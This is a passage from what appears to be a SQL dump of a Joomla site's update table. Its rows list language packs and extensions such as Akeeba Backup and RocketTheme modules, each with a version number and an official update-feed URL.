Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6308,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6309,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6310,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6311,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6312,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6313,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6314,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6315,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6316,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6317,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6318,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6319,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6320,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6321,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6322,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6323,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6324,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(6325,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(6326,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(6327,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6328,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6329,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6330,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6331,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6332,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6333,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6334,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6335,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6336,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6337,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6338,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6339,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6340,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6341,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6342,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6343,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6344,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6345,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6346,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6347,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6348,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6349,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6350,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6351,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6352,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6353,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6354,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6355,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6356,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6357,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6358,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6359,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6360,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6361,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6362,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6363,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6364,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6365,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6366,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6367,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6368,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6369,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6370,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6371,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6372,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6373,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6374,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6375,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6376,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6377,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6378,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6379,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6380,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6381,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6382,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6383,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6384,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6385,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6386,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6387,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6388,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6389,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6390,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6391,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6392,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6393,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6394,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6395,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6396,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6397,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6398,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6399,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6400,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6401,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6402,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6403,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6404,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6405,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6406,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6407,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6408,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6409,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6410,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6411,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6412,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6413,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6414,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6415,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6416,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6417,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6418,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6419,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6420,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6421,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6422,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6423,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6424,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6425,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6426,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(6427,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(6428,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(6429,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(6430,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(6431,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6432,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6433,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6434,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6435,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6436,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6437,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6438,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6439,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6440,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6441,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6442,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6443,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6444,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6445,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6446,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6447,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6448,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6449,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6450,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6451,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6452,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6453,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6454,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6455,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6456,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6457,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6458,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6459,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6460,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6461,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6462,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6463,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6464,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6465,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6466,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6467,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6468,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6469,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6470,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6471,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6472,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6473,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6474,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6475,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6476,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(6477,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(6478,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(6479,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(6480,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(6481,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(6482,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(6483,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6484,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6485,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6486,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6487,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6488,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6489,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6490,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6491,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6492,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6493,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6494,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6495,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6496,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6497,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6498,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(6499,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(6500,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(6501,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(6502,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(6503,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6504,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(6505,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6506,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(6507,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(6508,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(6509,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6510,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(6511,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(6512,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(6513,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6514,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(6515,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6516,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(6517,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6518,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(6519,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(6520,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(6521,57,0,'German 